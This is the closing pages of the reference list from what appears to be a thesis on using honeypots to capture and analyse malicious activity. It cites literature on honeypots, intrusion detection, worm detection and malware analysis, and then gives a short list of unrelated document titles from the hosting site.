[Sen and Krömer 2008] Sen, Evrim ; Krömer, Jan: Hackerkultur und Raubkopierer Eine wissenschaftliche Reise durch zwei Subkulturen (German). 2008
[Sharma 2005] Sharma, Mayank: CLI Magic: Logrotate. Published: October 2005.
http://www.linux.com/feature/48390, Retrieved: August 11, 2009
[Singh et al. 2004] Singh, Sumeet ; Estan, Cristian ; Varghese, George ; Savage,
Stefan: Automated Worm Fingerprinting. In: Proceedings of the 6th Conference on
Symposium on Opearting Systems Design & Implementation, 2004, p. 45–60
[Skoudis and Zeltser 2003] Skoudis, Ed ; Zeltser, Lenny: Malware: Fighting Malicious
Code. Prentice Hall, 2003
[“B-Bstf” Smith 2004] Smith, Andrew “B-Bstf”: A Guide to Internet Piracy. In: 2600
- The Hacker Quarterly 21 (2004), No. 2, p. 26–29
173
References
[Sourcefire 2009] Sourcefire (Editor): Snort Users Manual. Published: 2009. http:
//www.snort.org/assets/82/snort_manual.pdf, Retrieved: August 11, 2009
[Spitzner 2000] Spitzner, Lance: Watching Your Logs. Published: 2000. http:
//www.spitzner.net/swatch.html, Retrieved: August 11, 2009
[Spitzner 2001a] Spitzner, Lance: The Value of Honeypots, Part One: Definitions and
Values of Honeypots. Published: 2001. http://www.securityfocus.com/infocus/
[Spitzner 2001b] Spitzner, Lance: The Value of Honeypots, Part Two: Honeypot
Solutions and Legal Issues. Published: 2001. http://www.securityfocus.com/
infocus/1498, Retrieved: August 11, 2009
[Spitzner 2002] Spitzner, Lance: Honeypots: Tracking Hackers. Addison Wesley, 2002
[Spitzner 2003a] Spitzner, Lance: Definitions and Value of Honeypots. Published:
2003. http://www.spitzner.net/honeypots.html, Retrieved: August 11, 2009
[Spitzner 2003b] Spitzner, Lance: The Honeynet Project: Trapping the Hackers. In:
IEEE Security & Privacy 1 (2003), No. 2, p. 15–23
[Spitzner 2003c] Spitzner, Lance: Honeypot Farms. Published: 2003. http://www.
securityfocus.com/infocus/1720, Retrieved: August 11, 2009
[Spitzner 2003d] Spitzner, Lance: Honeypots: Are They Illegal? Published: June
2003. http://www.securityfocus.com/infocus/1703, Retrieved: August 11, 2009
[Spitzner 2003e] Spitzner, Lance:
Honeypots: Simple, Cost-Effective Detection.
Published: 2003. http://www.securityfocus.com/infocus/1690, Retrieved: August 11, 2009
[Spitzner 2003f] Spitzner, Lance: Honeytokens: The Other Honeypot. Published:
[Spitzner 2003g] Spitzner, Lance: Moving Forward with Defintion of Honeypots.
Published: Mai 2003. http://www.securityfocus.com/archive/119/321957/30/
0/threaded, Retrieved: August 11, 2009
[Spitzner 2004] Spitzner, Lance: Problems and Challenges with Honeypots. Published:
[Stevens and Merkin 1995] Stevens, Curtis E. ; Merkin, Stan:
El Torito Bootable CD-ROM Format Specification.
Published: January 1995.
http:
//www.phoenix.com/NR/rdonlyres/98D3219C-9CC9-4DF5-B496-A286D893E36A/0/
specscdrom.pdf, Retrieved: August 11, 2009
174
References
[Stevens 1994] Stevens, William R.: TCP/IP Illustrated I - The Protocols. AddisonWesley, 1994
[Stillwell et al. 1981] Stillwell, W.G. ; Seaver, D.A. ; Edwards, W.: A Comparison
of Weight Approximation Techniques in Multiattribute Utility Decision Making. In:
Organizational Behavior and Human Performance (1981), p. 62–78
[Stoll 2005] Stoll, Cliff: The Cuckoo’s Egg: Tracking a Spy Through the Maze of
Computer Espionage. Pocket Books, 2005
[SWITCH 2002] SWITCH:
Default TTL Values in TCP/IP.
Published:
2002. http://secfr.nerim.net/docs/fingerprint/en/ttl_default.html, Retrieved: August 11, 2009
[Tanenbaum 2003] Tanenbaum, Andrew S.: Computer Networks. 4th Edition. Prentice
Hall, 2003
[Thomas and Martin 2006] Thomas, Rob ; Martin, Jerry: The Underground Economy:
Priceless. In: The USENIX Magazine 31 (2006), No. 6, p. 7–16
[Timm 2001] Timm, Kevin: Strategies to Reduce False Positives and False Negatives
in NIDS. Published: September 2001. http://www.securityfocus.com/infocus/
[Troan and Brown 2002] Troan, Erik ; Brown, Preston: LOGROTATE(8). Published:
November 2002. http://www.linuxcommand.org/man_pages/logrotate8.html, Retrieved: August 11, 2009
[Trümper 1999] Trümper, Winfried: Summary about Posix.1e. Published: 1999.
http://wt.tuxomania.net/publications/posix.1e/, Retrieved: August 11, 2009
[Turnbull 2005] Turnbull, James: Hardening Linux. APress, 2005
[Vaughan et al. 2000] Vaughan, Gary V. ; Elliston, Ben ; Tromey, Thomas: Gnu
Autoconf, Automake, and Libtool. New Riders Publishing, 2000
[Venema 1992] Venema, Wietse: TCP Wrapper: Network Monitoring, Access Control
and Booby Traps. In: Proceedings of the Third Usenix UNIX Security Symposium,
1992
[Vind 2005] Vind, Janek:
XSS and Full Path Disclosure in PhpBB 2.0.8.
Published: January 2005. http://www.waraxe.us/index.php?modname=sa&id=34,
175
References
[Visa Inc. 2002] Visa Inc. (Editor): Visa Card Verification Value 2 (CVV2) Merchant
Guide - A Tool for Understanding CVV2 for Greater Fraud Protection. Published:
February 2002. http://www.bbbonline.org/eexport/doc/merchantguide_cvv2.
pdf, Retrieved: August 11, 2009
[VMWare 2006] VMWare (Editor): Virtualization Overview. Published: 2006. http:
//www.vmware.com/pdf/virtualization.pdf, Retrieved: August 11, 2009
[Vogelgesang 2007] Vogelgesang, Kay:
The XAMPP Security Console.
Published: 2007. http://www.apachefriends.org/en/xampp-windows.html#1221,
[Wagner and Soto 2002] Wagner, David ; Soto, Paolo: Mimicry Attacks on HostBased Intrusion Detection Systems. In: Proceedings of the 9th ACM Conference on
Computer and Communications Security, 2002
[Wang et al. 2006] Wang, Jisheng ; Hamadeh, Ihab ; Kesidis, George ; Miller,
David J.: Polymorphic Worm Detection and Defense: System Design, Experimental
Methodology, and Data Resources. In: Proceedings of the 2006 SIGCOMM workshop
on Large-scale attack defense, 2006, p. 169 – 176
[Wang et al. 2005] Wang, Yi-Min ; Beck, Doug ; Jiang, Xuxian ; Roussev, Roussi ; Verbowski, Chad ; Chen, Shuo ; King, Sam:
Automated Web Patrol with Strider HoneyMonkeys: Finding Web Sites That
Exploit Browser Vulnerabilities / Microsoft Research.
Published:
August
2005. http://research.microsoft.com/en-us/um/redmond/projects/strider/
honeymonkey/ndss_2006_honeymonkey_wang_y_camera-ready.pdf. 2005 (MSRTR-2005-72). – Forschungsbericht
[Watson 2007] Watson, David: GDH Global Distributed Honeynet. Published:
December 2007. http://www.ukhoneynet.org/PacSec07_David_Watson_Global_
Distributed_Honeynet.pdf, Retrieved: August 11, 2009
[Watson et al. 2005] Watson, David ; Holz, Thorsten ; Mueller, Sven ; Honeynet
Project (Editor): Know your Enemy: Phishing. Published: 2005. http://www.
honeynet.org/papers/phishing/, Retrieved: August 11, 2009
[Wicherski and Holz 2006] Wicherski, Georg ; Holz, Thorsten: Effektives Sammeln
von Malware mit Honeypots. In: Proceedings of 13th DFN-CERT Workshop, 2006
[Wikipedia 2007] Wikipedia: Comparison of Linux LiveDistros. Published: July
2007. http://en.wikipedia.org/wiki/Comparison_of_Linux_LiveDistros, Retrieved: August 11, 2009
176
References
[Willems et al. 2007] Willems, Carsten ; Holz, Thorsten ; Freiling, Felix: Toward
Automated Dynamic Malware Analysis Using CWSandbox. In: IEEE Security &
Privacy 5 (2007), No. 2, p. 32–39
[Woo 2003] Woo, Hyung-Jin: The Hacker Mentality: Exploring the Relationship Between Psychological Variables and Hacking Activities, University of Georgia, (PHD
Thesis), May 2003
[Wright et al. 2004] Wright, Charles P. ; Dave, Jay ; Gupta, Puja ; Krishnan,
Harikesavan ; Zadok, Erez ; Zubair, Mohammad N.: Versatility and Unix Semantics in a Fan-Out Unification File System. Published: October 2004. http:
//www.am-utils.org/docs/unionfs-tr/index.html, Retrieved: August 11, 2009
[Yoon and Hwang 1981] Yoon, Kwangsun ; Hwang, Ching-Lai: Multiple Attribute
Decision Making: Methods and Applications. Springer, 1981
[Yoon and Hwang 1995] Yoon, Kwangsun ; Hwang, Ching-Lai: Multiple Attribute
Decision Making: An Introduction. Sage, 1995
[Zalewski 2005] Zalewski, Michal: Silence on the Wire: A Field Guide to Passive
Reconnaissance and Indirect Attacks. No Starch Press, 2005
[Zalewski 2006] Zalewski, Michal: p0f 2 - Passive OS Fingerprinting Tool. Published:
2006. http://lcamtuf.coredump.cx/p0f/README, Retrieved: August 11, 2009
[Zhang and Leckie 2006] Zhang, Dana ; Leckie, Christopher: An Evaluation Technique
for Network Intrusion Detection Systems. In: Proceedings of the 1st International
Conference on Scalable Information Systems, 2006
[Zhang 2004] Zhang, Harry: The Optimality of Naive Bayes. In: Proceedings of the
17th International FLAIRS Conference, 2004
177

Using Honeypots to Capture and Analyze Malicious Activities on the

Transcription

Similar documents

The Role of the Registered Dietitian

Document - Analyzing Unknown Binaries

The New Age of Food Marketing

Hospital Quality at Home Caregiver Facts and

EDUCATING THE WHOLE CHILD

Assertive Discipline: Lee Canter

AC Green`s - Just Say YES

Vlogging Culture: Teaching cultural literacy with streaming pop

Mobile in the Classroom: Trends, Resources and How

Student Guide - Penn State College of Communications